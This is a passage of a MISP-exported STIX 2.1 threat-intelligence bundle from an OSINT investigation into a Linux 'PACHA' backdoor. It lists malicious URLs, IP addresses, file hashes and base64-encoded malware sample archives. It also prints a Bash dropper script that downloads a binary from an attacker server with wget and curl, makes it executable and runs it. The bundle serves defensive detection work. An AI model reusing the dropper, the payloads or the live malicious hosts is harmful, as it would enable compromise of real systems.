4 p L Y o 8 Q e w F j v Y f q r K A s Y m k 4 t M l 4 F B 7 D L W Q T 
S o Q p n / B K u o 0 Y 0 J 5 y V Q V Q u 5 b k t u G G y f g g b W E M 6 l C P 0 p E Q 8 x H b x W A I U 6 X N Q l b w 4 C B B n y 5 v Z 2 O x p Y k E m g r b E 0 I 5 a 68 b 6 r i Z D l U K n T 5 b p 1 m o c L I q r y 8 K C n c y 8 T Z u o m A O u X Y 6 O / 6 u E 5 O w V 7 i / Y E g 94 f x h 7 E X w X 9 o W g v a a 8 M m w 0 G z h z q 8 K h q 7 E K B I U W c S E O c k q u D v S 1 u 9 J J 31 a I A v f S U q h m s X H Z B o V + p y Q E S W a Q y b y y A I I M h R H O + y g D E h r a E q D 2 E Q 36 + G G 39 E X d l p h D m l Q C E r c 0 q B y 4 V f 7 l u V d a 11 r w H z z E 2 N W U t 6 b j w 70 v Q 69 d + j v i g F H t b r a K Z B p g 61 K u 6 i 3 E a r x N n 0 H 1 v I h k g e V 2 i k L I x 8 X o 13 c m b c 8 p 5 Z E t j T 5 M a q A Y b 9 T l Q S Q H z L P l 5 C A q n r S b T e B 6 F 0e2 T E l 0 C 8 e E x w 1 G v J J y M T 7 Z t N 8 t c H r O W 3 B Q u A 7 j q I I s B 6 f v j 2 K N x w s n D C w g g 5 g J k g / j e 7 u d C C s 43 z P K P g 2 B P o e 7 N t a d f C m y O j + 0 v s 1 J q n A a i R 1 O W g O 5 z + n d G 31 j 0 + 4 y 4 j 72 m Q G p 5 i k r j b 7 p E f l / l S z k Y r v R J A I e r S s w 9 c x 5 r z N d J k O 7 w 3 U b m 1 O 6 V b b b 5 F B L 3 H W b z U N t 0 97 l U K Z 6 P J x O s H L + F L p a S F 3 K R t Z M K H v x h k m m E l i T P e T S Y S + 0 q t / s h y r V K H J k m 1 U r K a w m H O O H V 5 P o x y 4 T 0 G 5 m e S u K 8 s 5 T E Q Q k 6 L w S W R e w C f F 5 x T N y m C Z U 54 G v H N n Z r 1 R e X k l S P U L r j k 6 L 9 r t n A P b b k 1 r i 2 O v 1 Z 26 y e c a / 9 e Z q + T l n L N j N a I H 1 e P u w K r 22 h i A M / I j H O G G T o U 5 v N D R l G b v M q 8 v S j 3 w j R B h X N y U x m e o q Y 6 / R 6 s 94 N V z M m k 9 K b s + e r p 9 l d h q T w v f S o p O h i q 9 T C v g i w v L 1 T c c / G / A L 99 w k 3 s A p L d U 8 a 3 v y I z 7 e a F I j H 3 Z a F 2 Y a X l C i j K L w + S j K a a T i 6 D w N W H N 7 L s Q i H g m c t 8 f X y 73 Q d b Y f X t v z x i M p L t P 5 G s T r h H 71 L D Q L J K 1 E L l 5 y J 2 Z E i k g
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:28:07Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf237b6-06bc-4e57-ad7e-31bb950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:30:46.000Z" ,
"modified" : "2019-06-01T08:30:46.000Z" ,
"pattern" : "[url:value = 'http://87.236.212.237/tmp/ofd' AND url:x_misp_host = '87.236.212.237' AND url:x_misp_scheme = 'http' AND url:x_misp_resource_path = '/tmp/ofd']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:30:46Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "malware" ,
"spec_version" : "2.1" ,
"id" : "malware--5cf23812-2ae8-4feb-8e8b-4a1f950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:35:54.000Z" ,
"modified" : "2019-06-01T08:35:54.000Z" ,
"is_family" : false ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "misc"
}
] ,
"implementation_languages" : [
"Bash"
] ,
"labels" : [
"misp:name=\"script\"" ,
"misp:meta-category=\"misc\"" ,
"misp:to_ids=\"False\""
] ,
"x_misp_script" : "#!/bin/sh\r\nid1=\"fkbgh\"\r\nid2=\"jm\"\r\nif [ -x \"/tmp/\" ] && [ -w \"/tmp/\" ]; then\r\nwget -O /tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /tmp/`echo $id1`\r\nchmod 7777 /tmp/`echo $id1`\r\n/tmp/`echo $id1` &\r\nelif [ -x \"/var/tmp/\" ] && [ -w \"/var/tmp/\" ]; then\r\nwget -O /var/tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /var/tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /var/tmp/`echo $id1`\r\nchmod 7777 /var/tmp/`echo $id1`\r\n/var/tmp/`echo $id1` &\r\nelif [ -x \"/dev/shm/\" ] && [ -w \"/dev/shm/\" ]; then\r\nwget -O /dev/shm/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /dev/shm/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /dev/shm/`echo $id1`\r\nchmod 7777 /dev/shm/`echo $id1`\r\n/dev/shm/`echo $id1` &\r\nelif [ -x $JBOSS_HOME ] && [ -w $JBOSS_HOME ]; then\r\nwget -O $JBOSS_HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o $JBOSS_HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x $JBOSS_HOME/`echo $id1`\r\nchmod 7777 $JBOSS_HOME/`echo $id1`\r\n$JBOSS_HOME/`echo $id1` &\r\nelif [ -x $HOME ] && [ -w $HOME ]; then\r\nwget -O $HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o $HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x $HOME/`echo $id1`\r\nchmod 7777 $HOME/`echo $id1`\r\n$HOME/`echo $id1` &\r\nelse\r\nwget -O `echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o `echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x `echo $id1`\r\nchmod 7777 `echo $id1`\r\n`echo $id1` &\r\nfi" ,
"x_misp_state" : "Malicious"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf238a2-0e5c-447e-a584-4072950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:34:42.000Z" ,
"modified" : "2019-06-01T08:34:42.000Z" ,
"pattern" : "[url:value = 'http://185.165.169.6/jp/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:34:42Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf2397c-b0a0-475d-b764-4c2a950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:38:20.000Z" ,
"modified" : "2019-06-01T08:38:20.000Z" ,
"pattern" : "[url:value = 'http://87.236.212.237/tmp/ofd' AND url:x_misp_scheme = 'http']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:38:20Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23a31-1db8-4b41-81af-4416950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:41:21.000Z" ,
"modified" : "2019-06-01T08:41:21.000Z" ,
"description" : "Used as proxy" ,
"pattern" : "[url:value = 'http://41.203.146.142:8080']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:41:21Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23ef7-5138-4a1f-b773-4766950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:03:10.000Z" ,
"modified" : "2019-06-01T09:03:10.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 9 a e 7 d c 5 f f 13526e8 c c 5 b 8 c 236066 a 828 ' A N D f i l e : h a s h e s . S H A 1 = ' 69 a f 27 d 553292952e4 d 93338 c 44 b 0 f 4e66 a 15470 ' A N D f i l e : h a s h e s . S H A 256 = ' 3 d 0 2 b b d d c 185352 d d c 1 d e a 20 f 54e2 f 2 b 39 f 180 a 9 b d 26 d 8453 b 5 a d 7 b 983466 c 95 ' A N D f i l e : n a m e = ' 3 d 0 2 b b d d c 185352 d d c 1 d e a 20 f 54e2 f 2 b 39 f 180 a 9 b d 26 d 8453 b 5 a d 7 b 983466 c 95 ' A N D f i l e : s i z e = ' 58088 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A D Z I w U 6 C x K l J g N 8 A A O j i A A A g A B w A O W F l N 2 R j N W Z m M T M 1 M j Z l O G N j N W I 4 Y z I z N j A 2 N m E 4 M j h V V A k A A / c + 8 l z 3 P v J c d X g L A A E E I Q A A A A Q h A A A A R y g P Q / f / V I i 0 w i I I X U v K k t f J X L 5 w Z u Y l C n d 8 f 36 y R 4 H g k X g p w I S q K a z C i 2 q o J 91 S z T M X O y / 1 h O 6 A M 9 S r a Q P Y J s i J P V A a 4 l f 7 B 3 J 2 Y M M c k s E U q q q O x j x B y 5 K 7 B 9 n 9 s W n N H Y 2 L C f 9 V 6 y Y x x K h Z x J g m f m 9 g o 8 t i K t t C C 2 s J 9 D y E r m E Q 0 5 Z k 4 Z D T R j F t w t l P y K Z q 4 k t L S D C M m n C n S g n 0 i K B / Q f d l T w 73 u u f x e b k 5 l p G 5 E N A K W E M 5 q T n 9 b Z x l x M 8 h 6 P 8 H 9e4 + y / B s X + 0 j / u 75 Y Z y w 0 M O w 4 j F u i b 9 X 0 x f f d v f c c s u 0 g l p C n M N I 51 x t 0 x q D t A y B X e X 5 s 8 j f f C 5 U q 4 G u 4 t m Y 8 M r / g o h S E I U r u I R t q 4 G h 3 Z j 68 s Y l e a / Z q 6 I t K R t m Y 2 V F L p c w 8 Y R 8 E P E s L U h J v T Y n 1 b E O 6 S z u j e h x R z 69 M f 3 Y j C h h D R d W L J 43 t E v 0 j / e 1 G d q b j z o F P d j v H B Q 9 S L 0 y x M M + 3 x k k O Q Y W c H S p t P n F D L R Y Y N B h 1 f g 823 z u v p c M O u K a k N y q N + 28 I F T i X b M A N i s k v o 380 K a h J z G N B M 8 m / 8 x j 388 M I b O h r K J E V 0 3 y H K X n C B / C V 4 O + g y z s 4 F N v T c D v / p p 
O c 9 C C y a j F P k 3 j c C 8 k E f n W B K Y I 5 l g D M v / a 0 t k Z w W H 50 h t A 6 Z y t k p G c A H c e i p L 3 + e y e G n y S O x D L L f p b h / d A u J v O h D b K P E j E V Q E s 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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T09:03:10Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23fe9-25c8-47df-a38a-4325950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:05:45.000Z" ,
"modified" : "2019-06-01T09:05:45.000Z" ,
"description" : "Most probably compromised host" ,
"pattern" : "[(network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '45.77.54.157')]" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T09:05:45Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"ip-port\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf24083-6de0-42e3-9ae7-4129950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:09:51.000Z" ,
"modified" : "2019-06-01T09:09:51.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' f 0 49 a e 13406 f d e b a d b 10960 b c 0 d e e e 87 ' A N D f i l e : h a s h e s . S H A 1 = ' d a 0 5 b 42311606 e a a 0 3 c a 8 e d d 6 a 94 f f 2 e a c d 44 c 2 b ' A N D f i l e : h a s h e s . S H A 256 = ' 62 c a 3 f d 0 70 d 6447e844 c 76e4 b e d c c e 908 a 18 b c 275 c 1 a 713415 d 11838 b 1 c b 5 f 0 4 ' A N D f i l e : n a m e = ' s l p r ' A N D f i l e : s i z e = ' 88728 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A A p J w U 42 q U O 0 S F U B A J h a A Q A g A B w A Z j A 0 O W F l M T M 0 M D Z m Z G V i Y W R i M T A 5 N j B i Y z B k Z W V l O D d V V A k A A 4 N A 8 l y D Q P J c d X g L A A E E I Q A A A A Q h A A A A P s 7 n q U q 9 A J q p 23 W J k v 8 f 4 t 1 K n g C I W D a I t L D m 6 e B I x k 256 s 9 p 85 E k E b w X B H 1 S / R n m 813 O V 2 / o w 5 r X h a q / w k i Q m T v A D j u T b W n G 6 G 5 b x R X f l d t 5 k o 85 b M N l U k D Q 4 R u K U G X G Z n 3 O M / e i 0 E G v l F N W 3 D u 9 l c Q z G A m / d 4 e Y R g I / x m + W n A Y D 7 K K W 2 g M S T v M Y U U e y Y / A I F w 0 R f c G I X 0 C N G 3 u B M s i 1 T f W p S t u v 5 q h K I O 7 I d r 4 e a 9 H t G u 84 S Q l g 5 r b c W n I o d w k a 6 d V 0 f f H a r g 17 X E K + l P R y l d B h C j O Z A Z f Y M Y z G B Q O R 0 X T 6 H / a f c F d I z g X 9 j Q u S U 8 / O 7 M R T f I d C d 8 f 22e5 i x c m m 8 C L c 6 o 9 J I W G M L 9 w 74 u w z 96 X R m J I 0 2 D 1 P n D l k t X z R C X A k a O r M 6 X X D w w 1 H p 9 a 26 K U K r 0 4 b M b c W l E N u U y K B t s 4 o g I 8 E v P 5 T 1 p B d S 1 t m b + q f j W U 3 j + v K H I 0 v a u X B c P 1 r j m 2 z t D D 3 z F j 4 W 7 O h n n B K L D A 3 e I g 2 s T w O G / 5 F + j 0 + 3 K l w D 4 b L K t y L + R J Z m f G 5 d 5 U o n f 9 Q q N i k K J J z Q w T N s J J g + p j N R m k k 3 Z 7 K x Q G e 0 7 z H K 3 a S o B E i v w i + n B 10 N 6 p P q D 9 I O 88 a q Y L r Q B S N g f K N w V z B 9 H Z B i h a P G s m z O g j V T v t p M 
+ q Y h 84 x 6 n 0 F o 3 D a B s 3 j q V I 9 G y d / Q q G 4 L U Q 11 + Q / g G C U 7 x r r s H j K 3 N o a G 1 A q q r a G I g n Y Z a Y J a n 5 D T Q 5 j I G u p + 5 g F U h j y k H G m b H r Z 6 q 6 I z A A + V 3 J o I v n e I j / q V D / w F i v c R 8 + j / U 4 w o v Z Q U 9 a Y U M x B 8 J 8 W f F l W 5 d D 4 X 9 N / C P a w R 9 P E 9 I G w / x f X g b D U 2 M v T 6 F V q C 7 / m k t 4 v I R K B s e A F N J 1 C c 148 P 2 J x h 124 T S X 0 c 9 B V w 9 A Z j M 0 K 1 D r z p n x N j + D I Q / P 3 U s Y z o m 13 F L F 8 r f u X 1 R N R R h S s x h R 67 L 0 T 95 Z s U i u k V N y y b r j r C g N H e y v J E 1 o L M S f V b Z v C m P 3 n p k x H A i n z l y 19 G g I o V i g h f l 1 t Y T a Y I z v q X e B m i a 5 F R I B m z Q 9 g 1 h x 6 U N i g u C x L L p A X M U h R I F + a B R f g m C m 9 n N d O j b R V Y M e c z s O t i G b I q E o P Q y a H 2 / s A 1 x F N 0 1 V y i k d n j v + x p j 5 Y Z m G 76 b o V 3 w l d 7 e a u B C z V X l K H u 43 k m f z N R J A q o X E i I 1 D k K 5 N z h L Z E l X J g K p E h 2 D Q U F D + K j c k R P q c 7 W T z m Y U D V U S u Z K g 8 I E d A k t 35 b q a b m v a c b 1 X n B h G P Z u 5 F 7 C K h t M 1 t r 67 J M h Q 68 g x T r v K s 9 L X K c 7 H A R U + N m Z e Q 39 G D 8 / q A Q p W Z c K n z b b f y h G Q a a u S c S w f g l l T 2 T s h u Y v E N k s e h w 1 k c q D 9 s m w C 3 p D Y A t K 7 b j / t n H T 93 / M 0 T l H r q r A s U b R 1 g 85 W 5 M U g Z u 1 R x l 2 q 8 I M T + 33 p 1 t 6 F p o H d Z G B 3 G d 92 t T T R 8 l T E E R 7 R f e q r 1 f Z h P 1 e T O A 9 y d a 7 o v w R L X p j M T 5 U Y X v Y 39 R J R n K m V 8 D n 6 q O y g H H I Y 0 M 17 b / 1 V J m h k G Y W C E o A t 3e0 C Z 638 H P 0 l P d Q I D l W / f a G W E D w u 49 y N B + S B 5 w q K T W K K T q 6 J b L S l D c P i B X x J l U u q H s n q F 1 y A 6 g 2 t 2 u q h X L p Z f 1 N B D K u y c O P s j j s b z i G H F x G M B D v Z I 1 l j W 9 U E 5 b M g b + l e F q A 0 1 s A s 0 r o T F c a d x j l a 9 W r u x i h w O u k e G A i P 53 B A Y F E f 6 G 3 e w 
e x E o 7 p A g 0 R 81 X 1 K G V T Z V S s x V t r 9 u q y V 947 G W r X 6 l r m F N I h Q C D K i Y K R w C Z 7 + W l w s b + E V H O g s I i h y e 0 G R 6 N B C Y 8 P I y 1 o H W h 1 W 2 Z q n T Z J M 25 e N G f 0 N 3 + a t n T f s i f 5 B 2 S o i n m a D G l i 8 F c n 4 z v w U z A w 7 L T u e 2 w h a e G O 7 h q w r A 0 m T I Y w 3 Z q v v I C n a z A n p + 7 S O G W m I C m 2 / e b g 8 s q 2 t 8 I + Q e F z x R w 8 H e H Q Z 1 s D M 1 d Y I z T W o o 0 i z L j S C 6 P T L o o u I U j k 3 S Z u I M n X J 89 J 6 P C t v C 7 U 2 G j z B u Q i M z i S b s O x g J t R W n g a I Y q I l s c h a s H a N f X F b m Z I X g L U b a i O y Z S Q J r Q + P r l 2 o T A A F 1 b G 1 c n 4 p d Q a c b I h 9 R z K k 6 c B a p 7 F s 4 Z s v O M k y + 2 v Q x o J a W M i h v O 7 j Y p F E T d P N 9 F l x o T B c H w R g U j D V + v e j 9 z E p a q M O C 8 m Q L g 3 T 88 h w k r r g 9 m T f m 2 G 8 Z n t 8 m Z T b r r x a q 7 M F e 0 y / 5 u H w 0 N v X u l 7 / q g I c 4 A y g m a Z 9 m y R D U n b b f 8 N h v c h 6 U p P V K t j K I 30 F d r j 47 K U s F c y G S / x z c 9 t 7 r N r J n i 4 s Q C f G 5 Y 6 R Z a K G s 565 m g C s C M z Y h u S W t Q M K Z z m z K n A o z G H + 7 F H Z 5 v H k l S 5 k b z 0 c p j l c 0 / f I I x T H + X 6 A B O p 0 i c b Z w G K M 7 t 6 o s l k q 1 N y d z S S S H v r 9 p Z / A 1 P J Q f J i 6 n o E c X L l P F 60 s Y X 8 o / Q d R t 4 x 8 d M F C X i s Q n T 0 t z 81 B 0 L D y m N Y f Y M + N f / 3 s 1 N N T X R J o y X X H l x 84 J P d h y b U j m 72 C r b k H Z / 7 S 1 A D 74 e p U R U J P P L X P W b b 1 d K / s n u d O R 0 3 u K o i q 1 G c i O h q v s e M d 13 G j e I m F L w z a F e X V 0 E Q y T v k c n X E Z D g l y a e j I Y W I Y R F H t F Y h / h z P b 4 T D 0 5 M / U J j h 3 g o L Y D / D 5 F U S Q H G e j 4 S 2 / n u n R s F d S N U i 9 l Z V h j c E L J 0 c B R U 1 + K F b G N N g l N 7 n H p c s l 5 E c h T 97 v Q F f Y V W s I 9 E v X Q J l 9 p v v 5 g C i r q N a w k c t K b C w r u R N F H s 1 f y i v 8 P 2 J E T z 6 z c g j o g 
I O C l I c U r 25 K H e T z b w O G 7 l T e 1 P 3 s 0 B R R S k F P a d 0 / q j G O W O 5 k I K A M 5 r d r U w 2 L y 8 j X U f K F Z 9 o O l c B l i e I E 4 H N D 2 v 9 l 0 l a S 9 l a A S z c w B i l Y t j l W t t A M U G y C h s e s T A P d N 1 S Y i y w f N H / u m K E E o 0 i k 5 i 5 K G y C t O D F 80 z o t G s K U c l M d A 4 s p w b s H 3 D p u j v 8 L m 0 U r + u F m v V 6 s Q g 6 s O i L k c u e G V 1 G Q g t B t K t m u U M i d c O m 0 R c u a v O X A V s y 8 I z I + E B x D 59 Z z 0 x x 4 G t Q H x v e A O F f k V r F D h i m O 9 M M 3 P J I T B M t U N i x G e X R L m d t 1 N 3 I t X n Y 4 w Q 5 K S x t 8 M a e E 1 p J x B i Q 4 C p Y + B B f J 0 48 F i F y L i O W E y s O T 7 W K M u + n 6 c a / Z q 3 L L d Q / e l 7 t l v F r 2 N d 2 E G G z Q J b 1 V S F v T k u m x q F E K Y f t E k / 8 q c M a P b 1 j B y D 9 J 9 O d T + C 1 O B 8 D Q y 8 l N 9 Y T I Y D c P W Z 1 x f A l T w L n / 68 r D i H k R z Y z p L v 2 w e T 9 Q X q 4 l / D T y D G y H F M m d o q P n Z 3 s Z D 9 l 1 C p G i g 8 z s i Q K h 2 v v l H 0 b O T M 3 m V B j m Q b l w h l N 5 h D d t 7 d V 0 J H L D M M Y k 7 R p F E E v A X v R e U D c c / o x D U 2 T 0 j g D Y w Z L x J u j g Y X i y m M T p L / o 3 a g p R M N q E h N Q W B 9 z i K 7 u l b l n p g q c S c e V X c X 8 T o W J r F G J J M f t p C e V l 4 x E G l Y Y 6 E L j p Y n 8 + r Z b L D P Y E F B M G N J x q 1 Y C m U J f V B + 8 P + 4 K o 5 O q L 4 M m C 56 M r J E 2 / 1 + D f C N Y z 25 s I M W b d N C b k h 85 i z U v f q s C 7 Y H a 4 v y t h V E t 0 y x i b P y 1 t 8 D k J L D E Z x v O U x 1 O H F q t n G k z Q C f r S Q 5 j A / o V b Y y 6 v f D Y 5 Y t R 7 p J S B g H j v g a d q a C Q g 33 Y 7 o d Z g n K A T U 2 c B 61 X N f p N v 0 s S x L L W E c C K X t f l o i / y F S D j b Z D 3 W y F D g i b k 9 L V r V 7 w s s B R / a n i h V k e g h R t e 2 f l 7 B L 2 O F A C p N q X J I U 93 j l 388 H l X b z h q D N + 9 J E w w K c P Z V a X 1 M j I G e 6 O / g O n E y 22 O B Y o S / c H 1 x n x B g E
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T09:09:51Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf240b4-352c-40a3-8aba-40b5950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:09:08.000Z" ,
"modified" : "2019-06-01T09:09:08.000Z" ,
"pattern" : "[url:value = '37.228.129.58/home/slpr' AND url:x_misp_scheme = 'http' AND url:x_misp_resource_path = '/home/slpr']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T09:09:08Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5cf241f4-75b0-43e7-80fe-4487950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:18:00.000Z" ,
"modified" : "2019-06-01T09:18:00.000Z" ,
"labels" : [
"misp:name=\"microblog\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "post" ,
"value" : "latest iptables commands found in new linux #PACHA backdoor sample, MD5=a4ef2477af0c769bb2043bca6b5843c2, the ACCEPTED IP should all be blacklisted." ,
"category" : "Other" ,
"uuid" : "5cf241f4-6b14-49eb-a550-4c70950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "type" ,
"value" : "Twitter" ,
"category" : "Other" ,
"uuid" : "5cf241f4-0f14-491e-b20a-40fa950d210f"
} ,
{
"type" : "url" ,
"object_relation" : "url" ,
"value" : "https://twitter.com/liuya0904/status/1134660970112999425" ,
"category" : "Network activity" ,
"to_ids" : true ,
"uuid" : "5cf241f4-ce4c-45d4-b3f5-465a950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "username" ,
"value" : "liuya0904" ,
"category" : "Other" ,
"uuid" : "5cf241f4-51f8-4638-bd9d-4623950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "state" ,
"value" : "Informative" ,
"category" : "Other" ,
"uuid" : "5cf241f4-54ac-4527-ae4e-45b3950d210f"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "microblog"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5cf24424-33b4-488b-8202-4db5950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:23:48.000Z" ,
"modified" : "2019-06-01T09:23:48.000Z" ,
"labels" : [
"misp:name=\"annotation\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "format" ,
"value" : "markdown" ,
"category" : "Other" ,
"uuid" : "5cf24424-8ee8-46e5-93a9-4a45950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "type" ,
"value" : "Annotation" ,
"category" : "Other" ,
"uuid" : "5cf24424-1584-4e9c-9fea-45e7950d210f"
} ,
{
"type" : "text" ,
"object_relation" : "text" ,
"value" : "OSINT investigation based on the original tweet from Liu Ya which contains a netfilter/iptables script with some IP addresses. By pivoting from the IP addresses, malware samples and scripts can be found at different locations. This quick analysis includes the scripts collected, the samples and the relationships between the various objects." ,
"category" : "Other" ,
"uuid" : "5cf24424-c33c-4187-8f6d-4907950d210f"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "annotation"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--f5b7e7ab-0b50-4285-ac22-baa90eafe67c" ,
"created" : "2019-06-01T07:57:37.000Z" ,
"modified" : "2019-06-01T07:57:37.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8" ,
"target_ref" : "x-misp-object--35f44d09-4103-4f11-a1dd-74fb99172734"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--60ac44d9-d531-45b1-8a21-5f140e87475b" ,
"created" : "2019-06-01T07:58:21.000Z" ,
"modified" : "2019-06-01T07:58:21.000Z" ,
"relationship_type" : "connects-to" ,
"source_ref" : "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8" ,
"target_ref" : "indicator--5cf22fbc-cecc-465b-a261-4385950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--55d8e5a8-d2fd-4f7e-85ae-eec938dd410d" ,
"created" : "2019-06-01T08:19:23.000Z" ,
"modified" : "2019-06-01T08:19:23.000Z" ,
"relationship_type" : "executes" ,
"source_ref" : "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8" ,
"target_ref" : "x-misp-object--5cf234e6-2cd4-43cc-8337-4fa1950d210f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--00d63c2c-7766-4631-b4fc-f6ee684f8368" ,
"created" : "2019-06-01T08:20:59.000Z" ,
"modified" : "2019-06-01T08:20:59.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f" ,
"target_ref" : "x-misp-object--49e52bb6-f81f-4516-99e4-e2e04f1c0bc7"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
